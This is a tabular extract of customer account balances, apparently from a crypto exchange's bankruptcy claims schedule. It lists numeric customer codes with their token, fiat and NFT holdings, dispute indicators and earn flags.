| 07338844 | | DOGE[21.21758964], USD[0.00] | | |
| 07338845 | | DOGE[1.02375105], USD[0.00] | Yes | |
| 07338846 | | USD[10.00] | | |
| 07338847 | | USD[10.00] | | |
| 07338848 | | USD[10.00] | | |
| 07338849 | | USD[10.00] | | |
| 07338851 | | DOGE[188.39691579], USD[0.02] | Yes | |
| 07338852 | | USD[10.00] | | |
| 07338853 | | USD[10.00] | | |
| 07338854 | | USD[10.00] | | |
| 07338855 | | USD[10.00] | | |
| 07338856 | | BAT[1.01142653], BRZ[1], CUSDT[2], DOGE[5.0334044], ETH[.00008405], ETHW[12.49848338], GRT[3.12345007], SHIB[4], TRX[27868.05724252], USD[0.00], USDT[4.26051128] | Yes | |
| 07338857 | | USD[10.00] | | |
| 07338858 | | USD[10.00] | | |
| 07338859 | | USD[10.00] | | |
| 07338860 | | USD[10.70] | Yes | |
| 07338861 | | USD[0.00] | Yes | |
| 07338862 | | USD[0.06] | | |
| 07338863 | | CUSDT[2], DOGE[153.7526261], USD[0.10] | | |
| 07338864 | | DOGE[0], USD[0.00] | | |
| 07338865 | | USD[10.00] | | |
| 07338866 | | DOGE[0], GRT[0], USD[0.00] | | |
| 07338867 | | USD[11.04] | Yes | |
| 07338868 | | DOGE[20.131471], USD[0.00] | | |
| 07338869 | | CUSDT[2], DOGE[16.17596761], USD[104.99], USDT[0] | | |
| 07338870 | | BRZ[1], CUSDT[5], USD[0.00], USDT[1] | | |
| 07338871 | | AVAX[0], BTC[0], DOGE[1], ETHW[0.00008240], GRT[0], PAXG[0], SHIB[4078.55716636], SOL[0.00002301], SUSHI[0], TRX[1271.85382320], USD[0.00], USDT[0] | Yes | |
| 07338872 | | DOGE[18806.1684775], TRX[2], USD[105.74] | Yes | |
| 07338873 | | USD[10.00] | | |
| 07338874 | | BRZ[1], CUSDT[4], TRX[1], USD[0.00] | Yes | |
| 07338875 | | USD[10.00] | | |
| 07338876 | | USD[10.97] | Yes | |
| 07338878 | | USD[10.00] | | |
| 07338879 | | USD[10.00] | | |
| 07338880 | | USD[10.00] | | |
| 07338881 | | BRZ[1], CUSDT[3], DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338882 | | BAT[1.01655549], BRZ[2], CUSDT[1], DOGE[0], ETH[0], SOL[.00009877], TRX[4], USD[0.00] | Yes | |
| 07338884 | | USD[10.00] | | |
| 07338885 | | CUSDT[1], USD[0.00] | Yes | |
| 07338886 | | CUSDT[3], DOGE[1], NFT (372035192317601479/SolBunnies #4038)[1], NFT (481275413325786423/SolBunnies #708)[1], SOL[.56918814], TRX[2], USD[0.00] | Yes | |
| 07338887 | | BTC[.00043256], CUSDT[4], DOGE[1732.5523027], ETH[.01139793], ETHW[.01126113], TRX[1], USD[0.00] | Yes | |
| 07338888 | | USD[0.00] | Yes | |
| 07338889 | | BTC[0], DOGE[0], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], YFI[0] | Yes | |
| 07338890 | | USD[10.00] | | |
| 07338891 | | CUSDT[1], DOGE[1], USD[0.01] | Yes | |
| 07338892 | | USD[0.34] | | |
| 07338893 | | BAT[1.01273793], BRZ[1], BTC[0.00452962], CUSDT[2], DOGE[439.79503894], GRT[83.41188058], MATIC[293.71627285], SOL[6.88555627], SUSHI[17.86083468], TRX[2], UNI[5.64868387], USD[-100.00], USDT[1.09729592] | Yes | |
| 07338894 | | USD[0.00] | | |
| 07338895 | | USD[0.00] | Yes | |
| 07338896 | | USD[10.00] | | |
| 07338897 | | USD[10.00] | | |
| 07338899 | | USD[2.01] | | |
| 07338900 | | DOGE[1], ETH[0], SOL[.27985566], SUSHI[13.99737735], USD[0.00] | | |
| 07338901 | | BTC[.00000001], SHIB[27245.00123213], USD[0.00] | Yes | |
| 07338902 | | USD[10.00] | | |
| 07338903 | | DOGE[71165.63074038], ETH[.49479866], ETHW[.49459066], NFT (536216137773631156/Entrance Voucher #3180)[1], USD[0.83], USDT[0] | Yes | |
| 07338904 | | GRT[130.36660412], TRX[1], USD[0.00] | Yes | |
| 07338905 | | USD[10.00] | | |
| 07338907 | | BAT[0], BRZ[2.00000034], BTC[0], CUSDT[2], DOGE[0], GRT[0], SOL[0], SUSHI[0], USD[0.00] | Yes | |
| 07338908 | | DOGE[153.64506253], USD[0.00] | Yes | |
| 07338910 | | USD[10.00] | | |
| 07338911 | | CUSDT[1], DOGE[34.289862], NFT (455372057211821465/Entrance Voucher #2409)[1], TRX[209.10031832], USD[0.00] | Yes | |
| 07338912 | | USD[10.00] | | |
| 07338913 | | USD[0.00], YFI[.00022612] | Yes | |
| 07338914 | | USD[0.00] | | |
| 07338915 | | USD[10.00] | | |
| 07338916 | | USD[10.00] | | |
| 07338917 | | BTC[.00197688], CUSDT[8], USD[0.00] | | |
| 07338918 | | USD[10.00] | | |
| 07338919 | | USD[10.00] | | |
| 07338920 | | BRZ[1], CUSDT[4], DOGE[121.8710741], TRX[1], USD[21.79] | Yes | |
| 07338921 | | SHIB[6304089.0708703], USD[0.00], USDT[0] | Yes | |
| 07338922 | | BTC[0], DOGE[3], TRX[1], USD[0.00] | | |
| 07338923 | | USD[10.00] | | |
| 07338924 | | CUSDT[1], DOGE[0], SHIB[290108.66347687], TRX[1], USD[0.00] | | |
| 07338925 | | USD[10.00] | | |
| 07338926 | | DOGE[95.09125537], USD[0.84] | | |
| 07338928 | | LINK[0], USD[0.01], USDT[0] | Yes | |
| 07338929 | | BRZ[1], BTC[.0029993], CUSDT[1], PAXG[.00496615], TRX[1], USD[0.51] | Yes | |
| 07338930 | | SUSHI[.59450935], USD[0.00] | Yes | |
| 07338931 | | USD[10.00] | | |
| 07338932 | | USD[10.00] | | |
| 07338933 | | USD[10.00] | | |
| 07338934 | | BTC[.00025038], USD[0.00] | Yes | |
| 07338935 | | BTC[.00015002], DOGE[1], ETH[.00205178], ETHW[.00202442], SHIB[295.0051489], SUSHI[1.46017538], UNI[.68901052], USD[0.00], USDT[0] | Yes | |
| 07338936 | | USD[10.00] | | |
| 07338937 | | BTC[.00021273], DOGE[1], USD[0.00] | Yes | |
| 07338938 | | USD[10.00] | | |
| 07338939 | | BTC[0.02702776], CUSDT[1], DOGE[3338.96624032], ETH[.15448554], ETHW[.13451121], MATIC[28.21318543], SHIB[680888.51234201], USD[0.01] | Yes | |
| 07338940 | | CUSDT[3], DOGE[1], USD[0.00] | | |
| 07338941 | | BTC[.0002949], USD[0.00] | | |
| 07338942 | | USD[10.00] | | |
| 07338943 | | BRZ[0], DOGE[1.00007087], USD[0.01] | | |
| 07338944 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338945 | | BRZ[1], CUSDT[9], GRT[.04326281], TRX[7.00000359], USD[0.00], USDT[0] | Yes | |
| 07338946 | | USD[10.00] | | |
| 07338947 | | USD[10.00] | | |
| 07338948 | | USD[10.00] | | |
| 07338949 | | BTC[.00017319], DOGE[2], USD[0.00] | | |
| 07338950 | | BRZ[2], BTC[.00082983], CUSDT[5], DOGE[256.5653575], LINK[1.66102106], LTC[.70382686], SUSHI[8.68921782], TRX[650.04403024], UNI[5.52438905], USD[0.00] | Yes | |
| 07338951 | | USD[10.00] | | |
| 07338952 | | USD[10.00] | | |
| 07338953 | | USD[10.00] | | |
| 07338954 | | BTC[.02127801], CUSDT[2], DOGE[5.07559487], ETH[0.34845288], ETHW[0.34830341], SHIB[929953.17991102], SOL[11.93167566], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07338955 | | USD[10.00] | | |
| 07338956 | | BTC[.00098852], CUSDT[3], DOGE[248.24825207], ETH[.01620268], ETHW[.01599733], UNI[.81476026], USD[41.60] | Yes | |
| 07338957 | | DOGE[.14646701], TRX[2], USD[0.00] | | |
| 07338958 | | USD[10.98] | Yes | |
| 07338959 | | BCH[.33427312], BTC[.01506747], CUSDT[13], DOGE[5177.11831728], ETH[.18574956], ETHW[.1855121], GRT[1.00498957], LTC[1.2208866], SHIB[1], TRX[608.16642766], USD[28.75], USDT[1.10404056] | Yes | |
| 07338960 | | BRZ[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LTC[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07338961 | | CUSDT[1], USD[0.00] | Yes | |
| 07338962 | | CUSDT[3], DOGE[62.41445170], UNI[0], USD[0.00] | Yes | |
| 07338963 | Contingent, Disputed | BTC[0.00000332], CUSDT[1], DOGE[304.12794687], USD[0.00] | | |
| 07338964 | | USD[10.00] | | |
| 07338965 | | USD[0.00], USDT[0.00000001] | | |
| 07338966 | | USD[10.00] | | |
| 07338967 | | USD[10.00] | | |
| 07338968 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07338969 | | USD[10.98] | Yes | |
| 07338970 | | CUSDT[197.95834661], GRT[.98676029], TRX[2], USD[0.71], USDT[1] | | |
| 07338971 | | CUSDT[1], USD[0.00] | | |
| 07338973 | | USD[10.00] | | |
| 07338974 | | BTC[.00083939], CUSDT[33], DOGE[5269.10661901], ETH[.00793895], ETHW[.00784319], LTC[.68900696], TRX[1], USD[0.00] | Yes | |
| 07338975 | | USD[10.00] | | |
| 07338976 | | USD[10.00] | | |
| 07338977 | | BRZ[1], CUSDT[10], GRT[1], SUSHI[0], TRX[4], USD[0.01] | | |
| 07338978 | | USD[10.00] | | |
| 07338979 | | USD[0.17] | | |
| 07338980 | | DOGE[1], USD[0.01] | | |
| 07338981 | | USD[10.00] | | |
| 07338982 | | USD[10.00] | | |
| 07338983 | | USD[10.00] | | |
| 07338984 | | BRZ[0], BTC[0], CUSDT[2], DOGE[0], GRT[0], LTC[0], TRX[0], USD[0.00], USDT[0.00000064] | Yes | |
| 07338985 | | USD[10.00] | | |
| 07338986 | | BRZ[2], CUSDT[9], DOGE[67.31173991], LTC[.21453546], TRX[149.9418392], USD[0.00], USDT[.43079746] | | |
| 07338987 | | USD[10.00] | | |
| 07338988 | | ETH[.00553634], ETHW[.00553634], USD[0.00] | | |
| 07338990 | | BRZ[1], CUSDT[4], DOGE[.00228315], TRX[1], USD[0.00] | | |
| 07338991 | | USD[10.00] | | |
| 07338992 | | USD[10.00] | | |
| 07338993 | | USD[10.00] | | |
| 07338994 | | CUSDT[2], DOGE[1], TRX[3], USD[0.01] | | |
| 07338995 | | USD[10.00] | | |
| 07338996 | | BAT[395.08232501], BRZ[311.3834057], CUSDT[14], DOGE[6521.1668826], GRT[1.00498957], LINK[9.21056238], MATIC[206.40862594], SUSHI[12.7607323], TRX[11477.01583264], UNI[53.28135042], USD[4377.78] | Yes | |
| 07338997 | | USD[10.00] | | |
| 07338999 | | SHIB[228760.14454274], USD[0.00] | Yes | |
| 07339000 | Contingent, Disputed | DOGE[2194.84448143], SHIB[56206156.97174787], USD[0.00], USDT[0.00000001] | Yes | |
| 07339001 | | USD[0.00] | | |
| 07339002 | | CUSDT[2], DOGE[0], ETH[0], ETHW[0], GRT[2], USD[10.00], USDT[1] | | |
| 07339003 | | CUSDT[1], DAI[0], DOGE[42.44143826], TRX[73.54766098], USD[0.00] | Yes | |
| 07339004 | | CUSDT[1], GRT[1], TRX[1], USD[0.01] | | |
| 07339005 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339006 | | DOGE[0], USD[0.00] | Yes | |
| 07339007 | | USD[10.00] | | |
| 07339008 | | USD[10.00] | | |
| 07339009 | | BAT[2.1256128], CUSDT[21507.81871755], DOGE[12794.20325514], GRT[2.00498957], TRX[2], USD[300.83] | Yes | |
| 07339011 | | USD[0.00] | | |
| 07339012 | | USD[10.00] | | |
| 07339013 | | USD[10.00] | | |
| 07339015 | | BAT[2.02828944], BRZ[6.33724515], CUSDT[5], GRT[1], TRX[7], USD[0.00], USDT[1.0561592] | Yes | |
| 07339016 | | CUSDT[2], DOGE[118.69254071], USD[0.00] | | |
| 07339017 | | USD[10.00] | | |
| 07339018 | | BTC[.00989329], DOGE[2598.21359447], ETH[2.06586089], ETHW[2.0649744], GRT[536.01854016], LTC[17.54736627], TRX[5542.47742801], USD[0.00], USDT[0] | Yes | |
| 07339019 | | USD[10.00] | | |
| 07339020 | | CUSDT[3], DOGE[.27429032], TRX[4], USD[1.43] | | |
| 07339021 | | DOGE[6926.01560086], USD[-109.84] | | |
| 07339022 | | USD[0.00] | | |
| 07339023 | | USD[10.00] | | |
| 07339024 | | CUSDT[1], DOGE[162.88715391], TRX[1], USD[0.00] | | |
| 07339025 | | BRZ[1], CUSDT[6], DOGE[.00000342], GRT[1], TRX[2], USD[0.00] | | |
| 07339026 | | LINK[.35629429], USD[0.00] | | |
| 07339027 | | USD[10.00] | | |
| 07339028 | | CUSDT[2], DOGE[.00004451], TRX[3.02356542], USD[0.00] | | |
| 07339029 | | USD[10.32] | Yes | |
| 07339030 | | DOGE[1], USD[0.01] | Yes | |
| 07339031 | | CUSDT[4], DOGE[4.60223180], SHIB[19416.55645805], TRX[2], USD[0.00] | | |
| 07339032 | | DOGE[1], USD[0.00] | | |
| 07339033 | | TRX[199.61745311], USD[0.00] | | |
| 07339034 | | USD[10.00] | | |
| 07339037 | | USD[10.00] | | |
| 07339038 | | USD[10.00] | | |
| 07339039 | | USD[10.00] | | |
| 07339040 | | USD[0.01] | | |
| 07339041 | | LTC[0], USD[0.00] | | |
| 07339042 | | USD[10.00] | | |
| 07339043 | | LINK[9.51165133], SOL[7.18033511], USD[0.00], USDT[0] | Yes | |
| 07339044 | | UNI[.49677377], USD[0.00] | | |
| 07339045 | | USD[10.00] | | |
| 07339046 | | USD[10.00] | | |
| 07339048 | | USD[10.00] | | |
| 07339049 | | BAT[1], BTC[0], GRT[1], USD[0.00] | | |
| 07339050 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07339051 | | USD[10.00] | | |
| 07339052 | | USD[10.00] | | |
| 07339053 | | USD[10.00] | | |
| 07339054 | | BAT[2077.48899671], BRZ[1], BTC[.38312538], CUSDT[4], DOGE[25937.02917834], ETH[.15773337], ETHW[.15715904], GRT[1.00381374], KSHIB[79252.93472375], LINK[278.40986003], SUSHI[75.52218058], TRX[15744.87172776], USD[0.00] | Yes | |
| 07339055 | | USD[0.01] | | |
| 07339056 | | USD[10.00] | | |
| 07339057 | | CUSDT[7], DOGE[46.22560198], ETH[.05062293], ETHW[.05062293], SHIB[176297.09076283], TRX[3], USD[0.00] | | |
| 07339058 | | BF_POINT[100], USD[0.00], USDT[0] | | |
| 07339059 | | USD[10.00] | | |
| 07339062 | | CUSDT[1], DOGE[1.9894827], TRX[1], USD[0.00] | | |
| 07339063 | | DOGE[201.30617466], USD[0.00] | | |
| 07339065 | | LINK[.02124605], USD[651.14], USDT[0] | Yes | |
| 07339066 | | USD[10.00] | | |
| 07339067 | | DOGE[5], USD[0.01] | | |
| 07339068 | | BTC[.00021203], CUSDT[1], USD[0.00] | | |
| 07339069 | | USD[10.00] | | |
| 07339070 | | USD[10.00] | | |
| 07339071 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339072 | | BAT[457.29749398], CUSDT[5064.07131482], DOGE[1793.2880907], SHIB[11372389.88976117], TRX[1], USD[0.00] | Yes | |
| 07339073 | | USD[10.00] | | |
| 07339074 | | USD[10.00] | | |
| 07339075 | | BF_POINT[300], USD[23328.02], USDT[0.00000001] | Yes | |
| 07339076 | | USD[10.00] | | |
| 07339077 | | USD[10.00] | | |
| 07339078 | | USD[10.00] | | |
| 07339079 | | DOGE[1], USD[11.68] | | |
| 07339080 | | BAT[1.0165555], DOGE[3584.60313216], USD[0.00] | Yes | |
| 07339081 | | USD[10.00] | | |
| 07339083 | | USD[10.00] | | |
| 07339084 | | BCH[0], BTC[0], CUSDT[3], DOGE[0], ETH[0], KSHIB[0], SHIB[0], SOL[0.23447566], TRX[1], USD[0.01], USDT[0] | | |
| 07339085 | | AVAX[0], BCH[0], BTC[0], DAI[0], DOGE[0], ETH[0], ETHW[0.09818795], MKR[0], NEAR[0], PAXG[0], SHIB[0], SOL[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07339086 | | BAT[2], BRZ[1], CUSDT[4], DOGE[2], USD[0.00], USDT[1] | | |
| 07339087 | | USD[10.00] | | |
| 07339088 | | BTC[0.01305498], CUSDT[2], DOGE[20781.88764184], SHIB[1], USD[1847.40] | Yes | |
| 07339089 | | BTC[0], LTC[0], MATIC[0], SHIB[.0214876], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07339090 | | USD[10.00] | | |
| 07339091 | | USD[10.00] | | |
| 07339092 | | USD[10.00] | | |
| 07339093 | | USD[10.00] | | |
| 07339094 | | CUSDT[1], DOGE[184.92962605], USD[0.03] | Yes | |
| 07339095 | | CUSDT[1], TRX[1], USD[10.94] | | |
| 07339096 | | CUSDT[3], DOGE[216.81275974], TRX[3], USD[0.01], USDT[1] | | |
| 07339098 | | USD[10.00] | | |
| 07339099 | | BAT[1], TRX[1], USD[0.00] | | |
| 07339102 | | CUSDT[1], USD[0.00] | | |
| 07339103 | | USD[0.00] | Yes | |
| 07339104 | | DOGE[1], USD[0.01] | | |
| 07339105 | | GRT[6.96236276], USD[0.00] | | |
| 07339106 | | USD[10.00] | | |
| 07339107 | | BRZ[2], CUSDT[1], DOGE[21864.96886284], SUSHI[1.87901868], USD[0.00] | Yes | |
| 07339108 | | USD[10.00] | | |
| 07339109 | | BTC[.00021753], CUSDT[1], DOGE[587.80480269], SUSHI[.5722494], USD[6.87] | | |
| 07339110 | | BRZ[1], CUSDT[10], DOGE[1894.14467428], TRX[1], USD[0.00] | | |
| 07339111 | | USD[0.00] | | |
| 07339112 | | USD[10.00] | | |
| 07339113 | | USD[0.00] | | |
| 07339114 | | USD[0.02] | | |
| 07339115 | | USD[0.00] | | |
| 07339116 | | CUSDT[1], ETH[0.00000001], ETHW[0], USD[0.00] | Yes | |
| 07339117 | | USD[0.00], USDT[0.00000001] | | |
| 07339118 | | USD[10.00] | | |
| 07339119 | | ETH[.00517655], ETHW[.00517655], USD[0.00] | | |
| 07339120 | | USD[10.00] | | |
| 07339121 | | USD[10.00] | | |
| 07339122 | | CUSDT[12], DOGE[2], MATIC[.00006758], SHIB[581478.14010261], SOL[.12106407], TRX[1], USD[0.00] | Yes | |
| 07339123 | | BTC[.00114552], CUSDT[5], DOGE[627.4025307], ETH[.03775495], ETHW[.03728983], LTC[.18390145], USD[0.00] | Yes | |
| 07339124 | | USD[0.00] | | |
| 07339126 | | USD[10.00] | | |
| 07339127 | | USD[10.00] | | |
| 07339128 | | DOGE[.00003775], LTC[.00002474], SUSHI[.00098771], USD[0.01] | | |
| 07339129 | | BRZ[2], BTC[0.00216467], CUSDT[16], DOGE[10.02713297], ETH[.00000005], ETHW[.0000005], GRT[105.2013371], SHIB[11], SOL[0.00000001], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000019] | Yes | |
| 07339130 | | BAT[1], BRZ[1], CUSDT[2], GRT[0], LINK[0], SOL[4.91625287], TRX[1], USD[20.01] | | |
| 07339132 | | USD[10.00] | | |
| 07339133 | | CUSDT[2], TRX[5], USD[0.00] | | |
| 07339134 | | BAT[16.03694991], DOGE[583.43271676], GRT[13.0204728], PAXG[.01205821], SHIB[2], USD[0.00] | Yes | |
| 07339135 | | GRT[.1655], MATIC[5.4115], USD[1.16] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339136 | Contingent, Disputed | USD[10.00] | | |
| 07339137 | | USD[10.00] | | |
| 07339139 | | USD[10.00] | | |
| 07339140 | | USD[10.00] | | |
| 07339141 | | DOGE[1.09300794], USD[0.00] | | |
| 07339142 | | CUSDT[2], DOGE[7439.37085883], TRX[1], USD[0.01] | | |
| 07339143 | | USD[10.00] | | |
| 07339144 | | USD[10.00] | | |
| 07339145 | | SHIB[138197.23089261], USD[0.00] | Yes | |
| 07339146 | | DOGE[819.1540876], SHIB[3.98792718], USD[0.00], USDT[0] | Yes | |
| 07339147 | | DOGE[13.02948572], USD[19.00] | | |
| 07339149 | | USD[10.00] | | |
| 07339151 | | USD[10.00] | | |
| 07339152 | | DOGE[139.92086487], SHIB[2], USD[0.00] | Yes | |
| 07339153 | | BRZ[1], DOGE[1], USD[10.00] | | |
| 07339154 | | USD[10.00] | | |
| 07339155 | | DOGE[1.06165], TRX[1], USD[0.00] | | |
| 07339157 | | BRZ[1], BTC[0.00888269], CUSDT[25], DOGE[2], SOL[4.33055953], TRX[1501.55828649], USD[0.00] | Yes | |
| 07339158 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07339161 | | GRT[.00004168], TRX[1], USD[10.00] | | |
| 07339162 | | DOGE[1], GRT[4.41912485], TRX[1], USD[0.00] | | |
| 07339163 | | CUSDT[376.54733062], USD[0.00] | | |
| 07339165 | | USD[0.00] | | |
| 07339166 | | DOGE[3531.35655406], USD[0.00] | | |
| 07339167 | | CUSDT[1], DOGE[1000.05219094], USD[0.00] | | |
| 07339168 | | BRZ[2], CUSDT[10], DOGE[800.25482008], SOL[6.80916157], TRX[3632.52939387], USD[0.00], USDT[1] | | |
| 07339169 | | BRZ[1], CUSDT[1], DOGE[27.8117496], TRX[1], USD[0.00] | | |
| 07339170 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07339171 | | BRZ[2], DOGE[1], TRX[6941.14965564], USD[0.00] | | |
| 07339172 | | USD[10.00] | | |
| 07339173 | | CUSDT[1], DOGE[2], GRT[29.13692177], SUSHI[5.65300819], TRX[113.28827235], USD[431.96] | Yes | |
| 07339174 | | USD[10.72] | Yes | |
| 07339176 | | BCH[1.10790785], BRZ[0], DOGE[13.97103624], ETH[2.47674579], ETHW[2.47570556], GRT[1076.95817303], LINK[24.4408459], LTC[1.11118317], SHIB[1], UNI[11.26783679], USD[0.00], USDT[0.00000001] | Yes | |
| 07339177 | | USD[10.00] | | |
| 07339178 | | USD[10.00] | | |
| 07339179 | | DOGE[1], ETH[0], USD[0.00] | | |
| 07339180 | | CUSDT[1], DOGE[3608.08646645], USD[0.00] | | |
| 07339181 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07339182 | | CUSDT[2], DOGE[12720.93865139], USD[0.00] | Yes | |
| 07339183 | | BRZ[0], DOGE[5644.51474838], LTC[.09075864], NFT (316251009037674958/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #44)[1], NFT (431300214035721776/Blue Face)[1], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07339184 | | USD[10.00] | | |
| 07339185 | | USD[10.00] | | |
| 07339187 | | USD[10.00] | | |
| 07339188 | | USD[10.00] | | |
| 07339189 | | USD[0.00] | | |
| 07339190 | | USD[10.00] | | |
| 07339191 | | DOGE[33.08445004], USD[0.00] | | |
| 07339192 | | USD[0.00], USDT[0] | | |
| 07339193 | | DOGE[.09110901], USD[0.00] | | |
| 07339194 | | BRZ[1], CUSDT[1], DOGE[4949.89387427], TRX[3], USD[482.60] | | |
| 07339195 | | USD[10.00] | | |
| 07339196 | | CUSDT[12], DOGE[1540.67904785], TRX[2269.13707941], USD[0.00] | Yes | |
| 07339197 | | BRZ[1], CUSDT[6], DOGE[5.12269471], ETH[.03157411], ETHW[.03117843], SOL[0], SUSHI[0], TRX[2], USD[0.00] | Yes | |
| 07339198 | | GRT[4.527812], USD[0.00] | | |
| 07339199 | | USD[10.00] | | |
| 07339200 | | BRZ[2], CUSDT[2], DOGE[823.35735821], TRX[1], USD[0.37] | | |
| 07339201 | | AVAX[-0.00000001], BF_POINT[200], BRZ[3.00006437], BTC[0.00000001], DOGE[0], ETH[0], GRT[0], MATIC[0], NFT (374608113283897230/FTX - Off The Grid Miami #3087)[1], NFT (478297039632895673/Entrance Voucher #1880)[1], SHIB[25], SOL[0], SUSHI[0], TRX[9], USD[1.01], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339202 | | CUSDT[1], USD[0.00], YFI[.00017968] | | |
| 07339203 | | DOGE[.0002463], USD[0.00] | | |
| 07339204 | | USD[10.00] | | |
| 07339205 | | BRZ[1], BTC[.0095703], CUSDT[2], DOGE[2278.92003761], ETH[.08025899], ETHW[.08025899], TRX[2], USD[0.00] | | |
| 07339207 | | BRZ[3], CUSDT[8], DOGE[7.9876879], LTC[3.87369705], MATIC[216.03849385], SHIB[33046636.70115595], SOL[6.54451815], TRX[9], USD[152.15] | Yes | |
| 07339208 | | CUSDT[1], DOGE[117.69670605], TRX[2], USD[0.00] | | |
| 07339209 | | DOGE[.0827948], USD[0.00] | | |
| 07339210 | | USD[0.00] | | |
| 07339211 | | DOGE[359.92805757], USD[10.00] | | |
| 07339213 | | USD[10.00] | | |
| 07339214 | | DOGE[4], GRT[209.77773716], SOL[48.51936274], SUSHI[5.13811061], TRX[1], UNI[1.09220032], USD[0.00] | | |
| 07339216 | | USD[10.00] | | |
| 07339217 | | BTC[.00400061], CUSDT[3], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07339218 | | USD[10.00] | | |
| 07339219 | | USD[10.00] | | |
| 07339220 | | GRT[9.56698173], USD[0.00] | Yes | |
| 07339221 | | DOGE[0], ETH[.00000046], ETHW[.00000046], GRT[1.02024715], USD[0.00] | Yes | |
| 07339222 | | CUSDT[4], DOGE[700.33861813], TRX[1], USD[0.00] | | |
| 07339223 | | BRZ[2], CUSDT[6], DOGE[137.34113441], LTC[0], TRX[3], USD[50.00] | | |
| 07339224 | | USD[10.00] | | |
| 07339227 | | BTC[0], ETH[.00000002], ETHW[0], LINK[0], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07339228 | | USD[10.00] | | |
| 07339229 | | USD[10.00] | | |
| 07339230 | | USD[10.00] | | |
| 07339231 | | MATIC[.00221939], USD[0.00] | Yes | |
| 07339232 | | USD[10.00] | | |
| 07339233 | | BRZ[2], CUSDT[5], TRX[2], USD[0.01] | | |
| 07339234 | | BTC[.0281754], KSHIB[2310], LTC[.00902], SOL[75.369], USD[881.87], USDT[0.00000192] | | |
| 07339236 | | DOGE[3559.39996815], USD[10.00] | | |
| 07339237 | | USD[10.00] | | |
| 07339239 | | CUSDT[1], DOGE[1], ETH[0], USD[0.00] | | |
| 07339240 | | USD[10.00] | | |
| 07339242 | | USD[10.00] | | |
| 07339243 | | USD[10.00] | | |
| 07339244 | | BRZ[1], CUSDT[10], GRT[1], TRX[2], USD[0.42] | | |
| 07339245 | | USD[11.09] | Yes | |
| 07339246 | | USD[10.00] | | |
| 07339247 | | USD[0.00], USDT[0] | | |
| 07339248 | | BAT[1], USD[0.01] | | |
| 07339249 | | BTC[.0013657], ETH[.07840192], ETHW[.07840192], MATIC[34.62349929], SHIB[500000], USD[0.46] | | |
| 07339250 | | USD[10.00] | | |
| 07339251 | | DOGE[1490.26761288], USD[10.00] | | |
| 07339252 | | BTC[.00020696], USD[0.00] | | |
| 07339253 | | USD[0.00] | | |
| 07339254 | | GRT[5.74821995], USD[0.00] | | |
| 07339255 | | USD[10.00] | | |
| 07339256 | | DOGE[0] | | |
| 07339257 | | DOGE[.23677671], USD[0.00] | | |
| 07339258 | | CUSDT[5], TRX[2], USD[0.00] | | |
| 07339259 | | USD[10.00] | | |
| 07339260 | | USD[10.00] | | |
| 07339261 | | BTC[0], GRT[1], SHIB[1], SOL[0], USD[0.00], USDT[1.00000002] | | |
| 07339262 | | USD[10.00] | | |
| 07339263 | | BTC[0.05533755], DOGE[6905.71778654], ETH[0.24538000], ETHW[0.24329979], LTC[0.07209556], USD[0.00] | | |
| 07339264 | | TRX[178.67068651], USD[0.00] | | |
| 07339265 | | DOGE[60.27289686], USD[0.00] | Yes | |
| 07339266 | | DOGE[16.11546277], USD[0.12] | | |
| 07339267 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339268 | | DOGE[2007.66480269], USD[20.00] | | |
| 07339269 | | DOGE[1], GRT[8.00261700], LINK[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07339270 | | BCH[.00405127], BRZ[1], BTC[.00871766], CUSDT[1], ETH[.23971177], ETHW[.23951248], GRT[3.09230659], LINK[.96351057], MATIC[0.70399240], NFT (31642051833079334)/Lucia's Cute & Cozy Collection #1)[1], SHIB[3], SOL[5.34854332], TRX[3], USD[0.00], USDT[0.11560194] | Yes | |
| 07339271 | | BRZ[1], DOGE[1], ETH[.39901335], ETHW[.35242587], SHIB[10], USD[0.01] | Yes | |
| 07339272 | | USD[10.00] | | |
| 07339273 | | SHIB[351624.58796773], USD[0.00] | | |
| 07339274 | | CUSDT[1], DOGE[550.04684184], USD[0.00] | | |
| 07339275 | | DOGE[1], USD[0.00] | | |
| 07339276 | | DOGE[35.06366698], USD[0.00] | | |
| 07339277 | | BAT[1], BRZ[1], CUSDT[5], DOGE[1448.76896909], TRX[5], USD[0.00] | | |
| 07339278 | | USD[10.00] | | |
